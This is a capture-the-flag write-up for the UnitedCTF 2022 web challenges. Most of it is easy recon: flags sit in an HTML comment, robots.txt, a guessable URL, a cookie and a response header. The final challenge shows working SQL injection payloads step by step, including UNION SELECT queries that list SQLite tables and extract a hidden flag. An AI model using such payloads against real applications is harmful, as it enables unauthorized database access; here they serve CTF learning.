UnitedCTF 2022 Writeup - Web
Information à la source
Vous avez vu que la page d'accueil semble encore en construction. La compagnie laisse peut-être trainer ses secrets?
Author: Deimos
The description of the challenge talks about the page being in construction. And that it might still have some secrets.
I launched a browser and opened the challenge page.
The site was very simple. I looked at the source code and the flag was in a comment.
<!-- TODO : FLAG-H4CK1N9-C0C4-C0lA-->
Flag: FLAG-H4CK1N9-C0C4-C0lA
Un site bien caché
Le site semble bien protégé, il est introuvable lorsqu'on le cherche avec un moteur de recherche.
Author: Deimos
The description says that search engines can’t find the site. That immediately points to a robots.txt
file. I opened http://coca-cola.ctf.unitedctf.ca/robots.txt
and it contained the flag.
# FLAG-f0R-hum4n-0n1y
User-agent: *
Disallow: /
Flag: FLAG-f0R-hum4n-0n1y
La recette secrète
Bien que vos accès sont restreints vous donnant seulement accès aux recettes en cours de développement, vous avez accepté d’aider le SCRS à soutirer de l’information sur la recette originale de coke. Il vous reste maintenant à acquérir cette information…
Author: Deimos
This one talks about recipes. It says we only have access to the recipes that are being developed. But we need to find the original recipe.
There are two recipes on the site. This is their URLs:
- http://coca-cola.ctf.unitedctf.ca/recette/2
- http://coca-cola.ctf.unitedctf.ca/recette/3
We have recipes 2 and 3. What about recipe 1? I navigate to http://coca-cola.ctf.unitedctf.ca/recette/1 .
Flag: FLAG-F0R-Y0UR-3Y35-0N1Y
Un biscuit avec ça?
Une personne vous a dit qu'un secret est dans les cookies, c'est presque comme les biscuits chinois.
Author: Deimos
The description for this one talks about cookies. I opened the dev tools and looked at the site’s cookies.
Flag: FLAG-N0-F00D-H3R3
Secret en tête
Une personne ayant aussi de la difficulté avec l’administration a accepter de vous aider en vous donnant accès à un super secret. À l'acceuil, elle vous a répondu qu'elle avait de l'information en tête à donner.
Author: Deimos
The description talks about headers, so I opened Burp and checked the header in the site response.
HTTP/1.1 304 Not Modified
x-powered-by: Express
super-secret: FLAG-N0-M0R3-53CR3T
set-cookie: Secret here=FLAG-N0-F00D-H3R3; Path=/
etag: W/"5f8-pico+SlyZ/xyQxzJvO6Z5SUqOXs"
date: Mon, 03 Oct 2022 22:59:05 GMT
keep-alive: timeout=5
connection: close
Flag: FLAG-N0-M0R3-53CR3T
Wisdom 1
Did you check my website? It offers a way to search for inspirational quotes, I hope there's nothing wrong with it, but on the off chance that you might find anything, please be kind and let me know what you found :)
⚠️Note: If you find a flag that doesn't work for Wisdom 1, then it's probably the flag for Wisdom 2, and vice versa.
Author: hfz
The site allows searching for quotes.
I tried basic SQL Injections in the search field. Sending ' or 1 = 1 -- -
returned all the quotes.
Next, I tried to use order by
to find out how many columns the query returned ' or 1 = 1 Order By 1 -- -
. It returned 2 columns.
I kept experimenting and found out it was using SQLite.
I extracted the list of tables in the database.
aaa' Union Select name, sql from sqlite_master -- -
“CREATE TABLE my_s3cr3t_7abl3 (flag text)” - my_s3cr3t_7abl3
“CREATE TABLE quotes (author text, quote text)” - quotes
And then read the flag.
aaa' Union Select 1, flag from my_s3cr3t_7abl3 -- -
“FLAG-th4nk$_f0r_1nj3ct1ng_th3_v4x” - 1
Flag: FLAG-th4nk$_f0r_1nj3ct1ng_th3_v4x